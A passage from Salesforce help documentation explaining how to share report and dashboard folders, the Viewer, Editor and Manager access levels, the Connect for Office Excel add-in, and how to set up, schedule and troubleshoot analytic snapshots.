group or role to have. (3) Stop sharing the folder with the user, group or role.

See Also:
Share Reports and Dashboards
Share a Report or Dashboard with an Individual User
Share a Report or Dashboard with a Group
Share a Report or Dashboard by Role
Access Levels for Report and Dashboard Folders
User Permissions for Sharing Reports and Dashboards
Access Levels for Report and Dashboard Folders
User Permissions for Sharing Reports and Dashboards

Share a Report or Dashboard with an Individual User

If you only have one or two people to share a report or dashboard folder with, give them access individually.

Available in: All editions except Database.com

User Permissions Needed

“Manager” folder access or “Manage Reports in Public Folders”To share a report folder with internal users:

“Manager” folder access or “Manage Dashboards in Public
Folders”

To share a dashboard folder with internal users:

1. On the Reports tab, click Sharing Settings on a folder.
2. Select Internal Users.

Note:  Internal users don't include customer portal or partner portal users.

3. Find the user you want, click Share, and choose an access level.
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To search, just start entering a name.

4. Click Done, review your changes, and click Close.

See Also:
Share a Report or Dashboard Folder

Share a Report or Dashboard with a Group

If more than one or two people need access to an analytics folder, share the folder with a public group. That way you don't
have to keep track of which individuals you've shared it with.

Available in: All editions except Database.com

User Permissions Needed

“Manager” folder access or “Manage Reports in Public Folders”To share a report folder with public groups:

“Manager” folder access or “Manage Dashboards in Public
Folders”

To share a dashboard folder with public groups:

1. On the Reports tab, click Sharing Settings on a folder.
2. Select Public Groups.

3. Find the group you want, and click Share.

To search, start typing a name.

4. Choose the sharing level you want to give this group.
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Note:  Portal users can only have Viewer access to reports, and they can't use dashboards.

5. Click Done, review your changes, and click Close.

See Also:
Share a Report or Dashboard Folder

Share a Report or Dashboard by Role

When you give people access to a report or dashboard folder by virtue of the role they hold, you can closely control who has
access without having to keep track of users or groups.

Available in: All editions except Database.com

User Permissions Needed

“Manager” folder access or “Manage Reports in Public
Folders”

To share a report folder with a role or role and subordinates:

“Manager” folder access or “Manage Dashboards in Public
Folders”

To share a dashboard folder with a role or role and subordinates:

You can give report or dashboard folder access to users in a role, or to those users plus users in roles subordinate to that role.

For example, suppose the VP of Sales role and its subordinates have Viewer access to a dashboard folder, while the role
itself (VP of Sales) has Manager access to the folder. This means a user in the VP of Sales role has greater control than someone
with a role that's lower in the role hierarchy. If the VP of Sales leaves the company, whoever next assumes that role will be
able to manage dashboards in the folder.

1. On the Reports tab, click Sharing Settings on a folder.
2. Select Roles or Roles and Subordinates.

• Select Roles if you want to give access to all users who have that role.
• Select Roles and Subordinates if you want to give access to those users plus everyone with a role below them in the

role hierarchy.

3. Find the role you want, click Share, and choose a level of access.

To search, enter a name.
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4. Click Done, review your changes, and click Close.

See Also:
Share a Report or Dashboard Folder

Access Levels for Report and Dashboard Folders

Each user, group, or role can have its own level of access to a report and dashboard folder. Viewers can see the data; Editors
can determine what data is shown; and Managers can control access.

Available in: All editions except Database.com

Tip:  If you're not ready to share a report or dashboard, keep it in a personal folder that only you can access. The “My
Personal Custom Reports” folder and the “My Personal Dashboards” folder are already set up for you. Create more
if you need them. When you create a folder, it is accessible only to you and users with administrative permissions
until you share it.

See Also:
Share Reports and Dashboards
Viewer Access Levels to Report and Dashboard Folders
Editor Access to Report and Dashboard Folders
Manager Access to Report and Dashboard Folders
Share a Report or Dashboard Folder
Share a Report or Dashboard Folder
Comparing Access Levels for Report and Dashboard Folders

Viewer Access Levels to Report and Dashboard Folders

With Viewer access you can see the data in a report or dashboard, but you can’t make any changes, except by cloning it into
a new report or dashboard. All users have at least Viewer access to report and dashboard folders that have been shared with
them. (Some users may have administrative user permissions that give them greater access.)

Available in: All editions except Database.com
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For example, Samir is a sales rep who likes to start his day by checking his position on the sales leader board, which appears
on the Master Sales dashboard. He has to refresh the dashboard to get the latest standings, so he needs to be able to view the
data in the underlying reports. But he doesn’t want to edit the reports or the dashboard. All he needs is Viewer access to the
folder that contains the Master Sales dashboard.

See Also:
Access Levels for Report and Dashboard Folders
Editor Access to Report and Dashboard Folders
Manager Access to Report and Dashboard Folders

Editor Access to Report and Dashboard Folders

When you are an Editor on a folder, you can view and modify the reports and dashboards it contains, and move them to and
from any other folders you have Editor or Manager access to.

Available in: All editions except Database.com

For example, Allison, a sales manager, wants to provide a different sales dashboard for each of three regional teams. She’ll
need Editor access to the folder that contains the Master Sales dashboard so she canmove the underlying reports into the right
folders and then modify them to show the appropriate data. She’ll also need the Create and Customize Dashboards user
permission.

Note:  You can’t give Editor access to standard report folders. All users get Viewer access to these folders by default.

See Also:
Access Levels for Report and Dashboard Folders
Viewer Access Levels to Report and Dashboard Folders
Manager Access to Report and Dashboard Folders

Manager Access to Report and Dashboard Folders

With Manager access, you can do everything Viewers and Editors can do, plus control other users’ access to it, change its
properties, or delete it.

Available in: Enterprise, Unlimited, and Developer Editions

For example, Alan is a sales administrator who manages too many reports to pay attention to them all individually. He creates
a report folder called Regional Reports. As its creator, he automatically has Manage rights to the folder. He gives Sales Reps,
a public group, Viewer access. And he makes Allison, the sales manager, another Manager on the folder.
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Note:  You can’t give Manager access to standard report folders. All users get Viewer access to these folders by default.

See Also:
Access Levels for Report and Dashboard Folders
Viewer Access Levels to Report and Dashboard Folders
Editor Access to Report and Dashboard Folders

Comparing Access Levels for Report and Dashboard Folders

Use this chart for a quick view of what Viewer, Editor, and Manager access enables users to do with report and dashboard
folders.

Available in: Enterprise, Unlimited, and Developer Editions

ManagerEditorViewer

View reports or dashboards in the folder

Run reports in the folder

Refresh dashboards in the folder

Change/move/delete your own reports or dashboards in the folder

See who has what level of access to the folder

Change/move/delete reports or dashboards created by someone else in
the folder

Change the folder’s name

Change the folder’s sharing settings

See Also:
Share Reports and Dashboards
Access Levels for Report and Dashboard Folders
User Permissions for Sharing Reports and Dashboards
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User Permissions for Sharing Reports and Dashboards

Each level of access to a report or dashboard folder consists of a combination of specific user permissions. As an administrator,
you can further fine-tune users' access to dashboards and reports by assigning or removing one or more permissions.

Available in: All editions except Database.com

When analytics folder sharing is enabled, all users get Viewer access to report and dashboard folders except users with higher
administrative permissions. To give users broader privileges, assign Editor or Manager folder access and give report and
dashboard user permissions as needed.

DescriptionUser Permission

Create, edit, and delete dashboards in My Personal Dashboards folder.
Create dashboards and save into any shared folder if sharing rights allow.

Create and Customize Dashboards

Create, edit, and delete reports in My Personal Custom Reports folder.
Create reports and save into any shared folder if sharing rights allow.

Create and Customize Reports

Create dashboard folders and manage them if sharing rights allow.Create Dashboard Folders

Create report folders and manage them if sharing rights allow.Create Report Folders

Edit, move, save, and delete dashboards you created in shared folders.Edit My Dashboards

Edit, move, save, and delete reports you created in shared folders.Edit My Reports

Create, edit, delete dashboards1, and manage their sharing in all public
dashboard folders, which does not include others’ personal folders. This

Manage Dashboards in Public Folders

permission allows users to edit and share dashboards in all folders,
including hidden folders. They also get these permissions:
• Create and Customize Dashboards

• Create Dashboard Folders

• Edit My Dashboards

• View Dashboards in Public Folders

(1 To edit a dynamic dashboard, users also need Manage Dynamic
Dashboards and View My Team’s Dashboards.)

Create, edit, delete reports, and manage their sharing in all public report
folders, which does not include others’ personal folders. This permission

Manage Reports in Public Folders

allows users to edit and share reports in all folders, including hidden
folders. They also get these permissions:
• Create and Customize Reports

• Create Report Folders

• Edit My Reports

• View Reports in Public Folders

View dashboards in public dashboard folders, which does not include
others’ personal folders.

View Dashboards in Public Folders
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View reports in public report folders, which does not include others’
personal folders.

View Reports in Public Folders

See Also:
Share Reports and Dashboards
Share a Report or Dashboard Folder
Share a Report or Dashboard Folder
Comparing Access Levels for Report and Dashboard Folders

Report on Salesforce Data with Excel
Connect for Office includes an Excel add-in that enables you to securely access your Salesforce reports with Microsoft® Excel®.
You create the reports you need in Salesforce, then pull them into an Excel worksheet, and use Excel’s formulas, charts, and
pivot tables to customize and analyze your data.

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Run Reports”

AND

“Export Reports”

To access Salesforce reports from Excel:

The Excel add-in provides the same access to reports and fields that you normally experience in Salesforce. You can distribute
your customized Excel worksheets via the Documents tab, allowing all users to track customized analytics in real time. You
can reference data from multiple reports in one worksheet to create a single-page overview of key metrics.

Communication between Excel and Salesforce uses the same secure HTTPS protocol as when you log in via your Web browser.

See Also:
Communicate Your Report Data Effectively
Install Connect for Office
Log Into Connect for Office
Import Reports Into Excel with Connect for Office
Refresh and Update Data with Connect for Office
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Install Connect for Office

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

The system requirements for Connect for Office are:

• Microsoft® Office 2000, 2002, 2003, or 2007

• Microsoft® Windows® 2000, Windows XP, or Windows Vista® (32-bit only)

1. Close all Microsoft® Office programs, including Word, Excel®, and Outlook®.
2. At the top of any Salesforce page, click the down arrow next to your name. From the menu under your name, select Setup

or My Settings—whichever one appears.
3. From the left pane, select one of the following:

• If you clicked Setup, select Desktop Integration > Connect for Office
• If you clicked My Settings, select Desktop Add-Ons > Connect for Office.

Tip:

If you can’t see the download page, ask your administrator for access.

4. Click Install Now.
5. Click Yes when prompted to install Connect for Office. We recommend that you install Connect for Office to the default

folder suggested by the installer.
6. After the installation completes, open Excel or Word, and select the salesforce.com menu to begin using Connect for

Office.
7. The first time you open Word, you are prompted to enable macros from salesforce.com. You must enable the macros and

accept salesforce.com as a macro publisher to use the Word add-in.

Note:  The Connect for Office installer edits the registry on your computer. If your organization imposes security
that prevents you from editing the registry, log in as the administrator of your machine before installing Connect for
Office or contact your IT department for assistance.

See Also:
Report on Salesforce Data with Excel
Log Into Connect for Office

Log Into Connect for Office

You need to log in to Salesforce before you can request data from your Salesforce reports.

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

1. Open Excel.
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2. In Microsoft Office 2003 and earlier, select Log In from the salesforce.com drop-down menu on the Excel toolbar. In
Microsoft Office 2007, select the salesforce.com tab on the Ribbon, click the Reporting drop-down menu, and then select
Log In.

3. Enter your Salesforce username and password.
4. Click Login.

Note: If your organization restricts IP addresses, logins from untrusted IPs are blocked until they’re activated.
Salesforce automatically sends you an activation email that you can use to log in. The email contains a security token
that you must add to the end of your password. For example, if your password is mypassword, and your security
token is XXXXXXXXXX, you must enter mypasswordXXXXXXXXXX to log in.

See Also:
Report on Salesforce Data with Excel
Install Connect for Office
Import Reports Into Excel with Connect for Office

Import Reports Into Excel with Connect for Office

Import your custom or standard Salesforce reports into Excel so you can further analyze the data using Excel’s formulas, charts,
and pivot tables.

Available in: Personal, Contact Manager, Group, Professional, Enterprise, and Unlimited Editions

User Permissions Needed

“Run Reports”

AND
“Export Reports”

To access reports in Excel:

Tip: Here’s a sample Excel file you can download that shows a raw and a formatted report plus charts and summary
tables built using Excel's pivot tables and pivot charts.

1. Create a custom report in Salesforce. You can also use any of the standard reports.
2. Open a blank worksheet in Excel.
3. Select the salesforce.com tab on the Ribbon, click the Reporting drop-down menu, and then select Import a Report....

Note:  In Microsoft Office 2003 and earlier, select Import a Report... from the salesforce.com drop-down menu
on the Excel toolbar.

4. Select a report from the list of standard and custom Salesforce reports available to you.
5. Specify where you want to put the report data in your Excel file.

a. Enter the name of your Excel worksheet in the Destination worksheet field.
b. In the Cell field, enter the uppermost cell where you want to begin putting the data.
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If the specified worksheet and cells already contain report data, Connect for Office moves the existing data over to
make room for the new report data.

Tip:  Avoid renaming worksheets that contain imported reports. When you do that the connection between the
worksheet and your report is lost. You must import the report again to refresh the data.

6. Choose Raw Data to import the data without formatting, subtotals, or grand totals. Choose Formatted to keep the colors,
fonts, subtotals, and grand totals from the Salesforce report.

This is useful for importing large matrix reports with the data already summarized into a small table.

Tip:

• The Raw Data option is best if you’re importing summary or matrix reports for use with Excel formulas and
pivot tables.

• Use the Formatted option if you’re importing large matrix reports with the data already summarized into a
small table.

7. Click OK.

Tip:  You can copy and paste data from Excel into other Office applications. Use the Paste Special option, rather
than Paste, to reference the Excel data as a worksheet object. If the data then changes in Excel, you can right-click
the object and update it automatically. See the Microsoft Word help for more information.

See Also:
Report on Salesforce Data with Excel
Log Into Connect for Office
Refresh and Update Data with Connect for Office

Refresh and Update Data with Connect for Office

Keep your Salesforce reports up to date in Excel by periodically refreshing the report data and any pivot tables you have created.

After logging into Salesforce, select any of the following options from the salesforce.com Ribbon tab (or toolbar in Office
2003 and earlier):

• Refresh Existing Reports... - Allows you to choose which reports you want to update in Excel.

1. From the list of reports you have imported, select the reports to update.
2. Optionally, select Update Pivot Tables to update any pivot tables you have created in Excel for the selected reports.

The Refresh All Reports menu choice does this automatically.
3. Click Refresh Selected to update the report data.

To remove reports from this list, select the report names and click Delete Selected. The reports are not removed from
your Excel worksheet or from Salesforce, only from the list of reports available for refreshing.

• Refresh All Reports - Refreshes all of the reports that you have imported into your Excel file, including the pivot tables
referenced by those reports.
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Tip:

• If you write a formula, select an entire column rather than a range of cells, because the number of rows in your
report may change when you refresh the report data. For example, use =Sum(Sheet2!E:E) to sum column E
rather than =Sum(Sheet2!E1:E200).

• If you use the VLOOKUP and HLOOKUP functions in Excel to join data across different cell ranges, these functions
may make report record IDs, which are 15-character alphanumeric IDs, case-sensitive. Make sure to use the
correct case when identifying report records. See the Microsoft Excel help for more information.

See Also:
Report on Salesforce Data with Excel
Import Reports Into Excel with Connect for Office

Report on Historical Data with Analytic Snapshots
An analytic snapshot lets you report on historical data. Authorized users can save tabular or summary report results to fields
on a custom object, then map those fields to corresponding fields on a target object. They can then schedule when to run the
report to load the custom object's fields with the report's data. Analytic snapshots enable you to work with report data similarly
to how you work with other records in Salesforce.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

After you set up an analytic snapshot, users can:

• Create and run custom reports from the target object.

• Create dashboards from the source report.

• Define list views on the target object, if it's included on a custom object tab.

For example, a customer support manager could set up an analytic snapshot that reports on the open cases assigned to his or
her team everyday at 5:00 PM, and store that data in a custom object to build a history on open cases from which he or she
could spot trends via reports. Then the customer support manager could report on point-in-time or trend data stored in the
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custom object and use the report as a source for a dashboard component. For the total number of analytic snapshots you can
create, see Salesforce Limits.

See Also:
Communicate Your Report Data Effectively
Prepare Analytic Snapshots
Define an Analytic Snapshot
Map Analytic Snapshot Fields
Schedule and Run an Analytic Snapshot
Manage Analytic Snapshots
Troubleshoot Analytic Snapshots
Create a Dashboard
How Salesforce Analytics Works
Create a Custom Report in Accessibility Mode

Prepare Analytic Snapshots

To set up an analytic snapshot, you need a source report and a target object with fields to contain the data in the source report.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

To set up an analytic snapshot:

1. Create a new custom report that includes the fields you want to load as records into a target object.
2. Create a new custom object in which to store the records loaded from the source report.
3. Create fields on the target object that will receive the source report's results when the analytic snapshot runs.

Tips on Source Reports for Analytic Snapshots

• If you save a tabular source report with its details hidden, the report will not be available to include in an analytic snapshot.
Furthermore, if you hide the details of a tabular source report included in an analytic snapshot, the analytic snapshot will
fail when it runs. To verify that the details of the tabular source report are not hidden, view the report, click Show Details,
and save the report. The Show Details button only displays if the report's details are hidden.

• When creating the source report for your analytic snapshot, note the names of the fields you added to the report, as those
field names may be useful to you when you create fields on the target object in which to store the report results.

• You can choose any custom tabular or summary report as the source report, except legacy forecast reports, Quota vs Actual
reports, and Leads by Source reports. The Source Report  drop-down list does not display standard reports..
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• You can include up to 100 fields in your source report.
• You can delete the schedule of when an analytic snapshot runs. You can’t stop or pause an analytic snapshot when it is

running, nor can you delete its source report. To delete the source report, you must first remove the report from the analytic
snapshot by changing the report in the Source Report drop-down list..

• If you select Load No Data in the Fields from Source Report column, no data will load into the corresponding field in the
Fields in Target Object column when the analytic snapshot runs. .

• The (No fields with compatible data type) field displays in the Fields from Source Report column when a
field on the target object does not match the data type of a field on the source report..

Tips on Target Objects for Analytic Snapshots

Consider the following when setting up target objects for analytic snapshots:

• In Enterprise, Unlimited, and Developer Editions, use field-level security to make the target object's fields visible to the
appropriate users.

• You can’t delete a custom object if it’s a target object in an analytic snapshot.
• The fields on the target object determine field mapping availability. For example, your source report may include ten fields,

but if your target object includes one field, then you can only map one field in your analytic snapshot.
• You can add up to 100 fields to the target object.
• Target objects cannot contain validation rules or be included in a workflow.
• Analytic snapshots cannot contain target objects that trigger Apexcode to run when new records are created..
• When an analytic snapshot runs, it can add up to 2,000 new records to the target object. If the source report generates

more than 2,000 records, an error message is displayed for the additional records in the Row Failures related list. You can
access the Row Failures related list via the Run History section of an analytic snapshot detail page.

Tips on Analytic Snapshots

• Be aware of the type of license your Running User has. For example, if the Running User of an analytic snapshot has
a Salesforce license, users who have Force.com Platform or Salesforce Platform One licenses will not be able to view it.
Alternatively, if the Running User has a Force.com Platform or Salesforce Platform One license, users who have Salesforce
licenses will be able to see the analytic snapshot. If you have users with Force.com Platform or Salesforce Platform One
licenses, we recommend creating a separate analytic snapshot for them with a Running User that has a Force.com
Platform or Salesforce Platform One user license.

• You can only map fields with compatible data types. For example, you can map a currency field to a number field.
• If you change the source report or target object on an analytic snapshot with existing field mappings, the field mappings

are deleted when you save the analytic snapshot. You can also view Summary Fields in Source Report and Fields
in Target Object to see the number of summary or target fields, respectively..

• You must map at least one field from the source report to one field on the target object or data will not load from the source
report to the target object when the analytic snapshot runs.

• When an analytic snapshot is defined, deleted, or its source report or target object is changed, it is tracked in your
organization's setup audit trail history.

• The Run History section on an analytic snapshot detail page displays details on when the analytic snapshot ran. Details
include:

◊ The date and time at which the analytic snapshot ran
◊ The name of the source report, target object, and running user
◊ The time it took for the analytic snapshot to run
◊ The total number of detail or summary rows in the source report, depending on the report type
◊ The number of records created in the target object
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◊ Whether or not the analytic snapshot ran successfully

See Also:
Report on Historical Data with Analytic Snapshots
Define an Analytic Snapshot
Report on Historical Data with Analytic Snapshots
Create a Custom Report in Accessibility Mode

Define an Analytic Snapshot

After you create a source report, target object, and target object fields, you can define your analytic snapshot. You define an
analytic snapshot by naming it and choosing the source report that will load report results into the target object you specify
when the analytic snapshot runs.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

1. From Setup, click Data Management > Analytic Snapshots.
2. Click New Analytic Snapshot.
3. Enter a name, unique name, and description for your analytic snapshot.
4. Choose a user in the Running User field by clicking the lookup icon.

The user in the Running User field determines the source report's level of access to data. This bypasses all security
settings, giving all users who can view the results of the source report in the target object access to data they might not be
able to see otherwise.

Only users with the “Modify All Data” permission can choose running users other than themselves.

5. Select a report from the Source Report  drop-down list.

The report you choose determines the report results that will load as records into the target object when the analytic
snapshot runs.

You can choose any custom tabular or summary report as the source report, except legacy forecast reports, Quota vs Actual
reports, and Leads by Source reports. The Source Report  drop-down list does not display standard reports.

6. Select a custom object from the Target Object drop-down list.

The custom object you choose will receive the source report's results as records when the analytic snapshot runs.

If a record used for an analytic snapshot has no record type associated with it, the record type of the running user is associated
with the analytic snapshot by default.
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7. Click Save to save the definition of your analytic snapshot, or click Save & Edit Field Mappings to save your analytic
snapshot and map its fields.

8. Map the fields on the source report to the fields on the target object.

See Also:
Report on Historical Data with Analytic Snapshots
Prepare Analytic Snapshots
Map Analytic Snapshot Fields
Build a Report From a Template

Map Analytic Snapshot Fields

After you create a source report, target object, target object fields, and define your analytic snapshot, you can map the fields
on your source report to the fields on your target object. You map source report fields to target object fields so that when the
report runs, it automatically loads specific target object fields with data from specific source report fields.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

1. From Setup, click Data Management > Analytic Snapshots.
2. Select the name of the analytic snapshot whose fields you want to map.
3. Click Edit on the Field Mappings section.
4. For summary reports, select the Grouping Level at which summary data is extracted from the source report. Data loaded

into the target object is taken from summary fields at the grouping level you specify. The Grand Summary summarizes
on the total for all grouping levels.

5. In the Fields from Source Report column, click a Load No Data drop-down list and select a field from the source report
to map to a custom object field in the Fields in Target Object column. Only summary fields can be mapped for analytic
snapshots based on summary reports. Note that the fields for summary reports may vary depending on the grouping level
selected.

6. Click Quick Save to save field mappings and continue mapping fields, or click Save to save field mappings and return to
the analytic snapshot's detail page.

7. Next, schedule the analytic snapshot to run.

Considerations for Mapping Analytic Snapshot Fields

• You must map at least one field from the source report to one field on the target object or data will not load from the source
report to the target object when the analytic snapshot runs.
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• You can only map fields with compatible data types. For example, you can map a currency field to a number field.
• A custom summary formula can be mapped only if the grouping level in the analytic snapshot and the grouping level in

the custom summary formula match.
• If you select Load No Data in the Fields from Source Report column, no data will load into the corresponding field in the

Fields in Target Object column when the analytic snapshot runs..
• The (No fields with compatible data type) field displays in the Fields from Source Report column when a

field on the target object does not match the data type of a field on the source report.
• The fields on the target object determine field mapping availability. For example, your source report may include ten fields,

but if your target object includes one field, then you can only map one field in your analytic snapshot.
• You cannot map fields from the source report to the following fields on the target object: Created By, Last Modified

By, Created Date, and Last Modified Date.
• When you map fields from the source report to the target object, some data may lose its context when loaded to the target

object. For example, if you map a date and time field from the source report to a text field on the target object, the date
and time load to the target object without the time zone.

• When executing an analytic snapshot, if the running user does not have “read” or “write” access to a mapped field in the
target object, that field is dropped from the mapping, but does not cause the execution to fail. If a required field in the
target object is not mapped, the execution fails. To ensure that fields are always mapped, make them required or set default
values for them.

• To map a field in the source report to a lookup field on the target object, you must map to the ID of the object associated
with the lookup. For example, to map to an opportunity lookup field, you must map to the Opportunity ID. To get
the Opportunity ID in the source report, you may need to use a custom report type to include ID and other related
fields.

See Also:
Report on Historical Data with Analytic Snapshots
Define an Analytic Snapshot
Schedule and Run an Analytic Snapshot
Report on Historical Data with Analytic Snapshots
Build a Custom Summary Formula

Schedule and Run an Analytic Snapshot

After you create a source report, target object, target object fields, define your analytic snapshot, and map its fields, you can
schedule when it runs. You can schedule an analytic snapshot to run daily, weekly, or monthly so that data from the source
report is loaded into the target object when you need it.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

2743

Gather Data with ReportsGather Data



The number of analytic snapshots you can schedule to run is determined by your Edition. After an analytic snapshot has run,
you can send an email notification to yourself and other users that includes details about the analytic snapshot run, such as the
date and time it ran, whether it ran successfully, and how many records were loaded into the target object from the source
report. Also, the notification includes a link to the analytic snapshot detail page in Salesforce.

1. From Setup, click Data Management > Analytic Snapshots.
2. Select the name of the analytic snapshot that you want to schedule to run.

Analytic snapshots will not run as scheduled if the user in the Running User field does not have access to the folder in
which the source report is stored.

Note:  If the running user becomes inactive, the report is not run. The system administrator receives an email
notification to either activate the user, delete the report schedule, or change the running user to an active one in
the scheduled report.

3. Click Edit on the Schedule Analytic Snapshot section.

The Schedule Analytic Snapshot section on an analytic snapshot detail page displays details on when the analytic snapshot
is scheduled to run.

4. Select a notification setting to send an email when the analytic snapshot finishes running:

• Click Me to send an email to the email address specified on your Salesforce user record.
• Click Others... to send an email to additional users. You can only send analytic snapshot notifications to email

addresses included on Salesforce user records. Furthermore, you can only select Users and Public Groups in the Search
drop-down list.

5. Schedule the analytic snapshot to run:

• In the Frequency field, select the frequency at which the analytic snapshot runs. When you click the Daily, Weekly,
or Monthly fields, more options display that allow you to refine frequency criteria.

If you schedule an analytic snapshot to run on a specific day of every month, the analytic snapshot will only run on
months that have that specific day. For example, if you schedule an analytic snapshot to run on the 31st day of every
month, then the analytic snapshot will only run on months that have 31 days. If you want an analytic snapshot to run
on the last day of every month, choose last from the On day of every month drop-down list.

• In the Start and End fields, specify the dates during which you wish to schedule the analytic snapshot to run.
• In the Preferred Start Time drop-down list, click the Find available options... link to choose a preferred start

time for the analytic snapshot to run.

◊ Your preferred start time may not be available if other users have already selected that time to run an analytic
snapshot or your organization has reached its analytic snapshot limit.

◊ Analytic snapshots run in the time zone of the user who schedules the run. For example, if the Time Zone field
on your user record is set to Pacific Standard Time, and you schedule an analytic snapshot to run every day at 2:00
PM, then the analytic snapshot will run every day at 2:00 PM Pacific Standard Time.

◊ If you view and save a schedule in a time zone different from the one in which it was previously scheduled, the time
slot could potentially change.

◊ The analytic snapshot runs within an hour of the time you select in the Preferred Start Time drop-down list.
For example, if you select 2:00 PM as your preferred start time, the analytic snapshot may run any time in between
2:00 PM or 2:59 PM, depending on how many other analytic snapshots are scheduled to refresh at that time.

6. Click Save to schedule the analytic snapshot to run.
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When the analytic snapshot runs, it adds new records to the target object.

Optionally, once you have scheduled an analytic snapshot to run, you can perform the following actions after you click Edit
on the Schedule Analytic Snapshot section of an analytic snapshot detail page:

• Click Edit to update the notification and frequency settings of the analytic snapshot.

• Click Delete to permanently delete the existing schedule of when the analytic snapshot runs.

An analytic snapshot will fail during a scheduled run if:

• The source report includes more than 100 fields

• The source report was changed from summary to tabular

• The selected grouping level for a summary source report is no longer valid

• The running user does not have access to the source report

• The running user does not have the “Run Reports” permission

• The target object has more than 100 custom fields

• The target object contains validation rules

• The target object is included in a workflow

• The target object is a detail object in a master-detail relationship

• The target object runs an Apex trigger when new records are created on it

• The running user does not have the “Create” permission on the target object. Note that if the target object's status is In
Development, the running user must have the “Customize Applications” permission.

See Also:
Report on Historical Data with Analytic Snapshots
Map Analytic Snapshot Fields
Manage Analytic Snapshots

Manage Analytic Snapshots

After you set up an analytic snapshot, you can view details about it and edit and delete it. From Setup, click Data Management
> Analytic Snapshots to display the Analytic Snapshots page, which shows the list of analytic snapshots defined for your
organization.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

From the Analytic Snapshots page, you can:
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• Select a list view from the View drop-down list to go directly to that list page, or click Create New View to define your
own custom view..

• Define a new analytic snapshot by clicking New Analytic Snapshot.
• Update the analytic snapshot name, description, running user, source report, and target object by clicking Edit next to its

name. Only users with the “Modify All Data” permission can choose running users other than themselves. If you have the
“Customize Application” permission, enter a unique name to be used by the API and managed packages.

If you change the source report or target object on an analytic snapshot with existing field mappings, the field mappings
are deleted when you save the analytic snapshot. You can also view Summary Fields in Source Report and Fields
in Target Object to see the number of summary or target fields, respectively.

• Delete an analytic snapshot by clicking Del next to its name. After the analytic snapshot is deleted, it cannot be restored
from the Recycle Bin.

Important:  When you delete an analytic snapshot, the source report and target object aren’t deleted; however,
when the source report runs, it won’t load the target object with data.

You can delete the schedule of when an analytic snapshot runs. You can’t stop or pause an analytic snapshot when
it is running, nor can you delete its source report. To delete the source report, you must first remove the report
from the analytic snapshot by changing the report in the Source Report drop-down list.

• Display detailed information about an analytic snapshot and customize it further by clicking its name. Then you can:

◊ Click links in the Identification section that redirect you to the analytic snapshot running user, source report, and target
object. In addition, you can view the preferred date and time at which the analytic snapshot will approximately run
next in the Next Run field, and view the date and time at which it last ran in the Last Run field.

◊ Click Edit in the Field Mappings section to further customize the fields mapped from the source report to the target
object.

The Analytic Snapshot Field Mappings section displays which source report fields are mapped to the target object's
fields. You can view the number of fields in the source report available for mapping to the target object in the Columns
in Source Report field. Also, you can view the number of fields available for mapping in the target object in the
Fields in Target Object field.

◊ Click Edit in the Schedule Analytic Snapshot section to schedule when to run the analytic snapshot.

The Schedule Analytic Snapshot section displays details about when the analytic snapshot is currently scheduled to
run.

◊ The Run History section displays details about when the analytic snapshot ran. Details include:

- The date and time at which the analytic snapshot ran

- The name of the source report, target object, and running user

- The time it took for the analytic snapshot to run

- The total number of detail or summary rows in the source report, depending on the report type

- The number of records created in the target object

- Whether or not the analytic snapshot ran successfully
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Up to 200 records are stored in the Run History section. After 200 records are stored, the oldest record is automatically
deleted and cannot be retrieved from the Recycle Bin.

See Also:
Report on Historical Data with Analytic Snapshots
Schedule and Run an Analytic Snapshot
Troubleshoot Analytic Snapshots
Report on Historical Data with Analytic Snapshots

Troubleshoot Analytic Snapshots

The Run History section of an analytic snapshot detail page displays if an analytic snapshot ran successfully or not. When an
analytic snapshot fails during a scheduled run, the failure is noted in the Result column. To view the details of a run, click
the date and time of the run in the Run Start Time column.

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Manage Analytic Snapshots”To create, save, and schedule an analytic snapshot:

“Run Reports”

AND

“Create” on the target object

To run an analytic snapshot as a running user and add the
results to a custom object, the running user must have:

Tip:

• If the Total Row Number is blank, the run failed before the report was completed (for example, the report was
invalid or the running user is inactive).

• When an analytic snapshot runs, it can add up to 2000 new records to the target object. Any records over 2000
are recorded in the Row Failures related list. If the Total Row Number is blank and the run history indicates
“Some rows failed,” the report likely contained more than 2000 summaries.

• The details of a failed run are available on the Row Failures related list for 14 days before they are automatically
deleted. You cannot retrieve details about row failures from the Recycle Bin.

• If you have a unique field in the target object, and records in the report have more than one of the same value in
the column mapped to that unique field, duplicate records are not added. The run history indicates when records
are not added to the analytic snapshot.

• If field mappings failed, the snapshot still runs, but the run history shows that there was a partial error.

An analytic snapshot could fail during a scheduled run for a number of reasons. This table lists the errors a failed run may
display and how the errors can help you troubleshoot the analytic snapshot so that it will run successfully.
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DescriptionError

The user in the Running User field does not have the “Run
Reports” or “Create and Customize Reports” permission.

Running user does not have permission to
run reports.

Choose a user with the appropriate permissions or enable the
appropriate permissions for the running user.

The report in the Source Report field was deleted and no
longer available to run. Choose another source report for your

Cannot run analytic snapshot because
source report has been deleted.

analytic snapshot or restore the deleted report from the Recycle
Bin.

The user in the Running User field does not have access to
the folder in which the source report is stored. Choose a user

Running user does not have permission to
access source report.

with access to the source report or provide the existing running
user with access to the folder in which the source report is
stored.

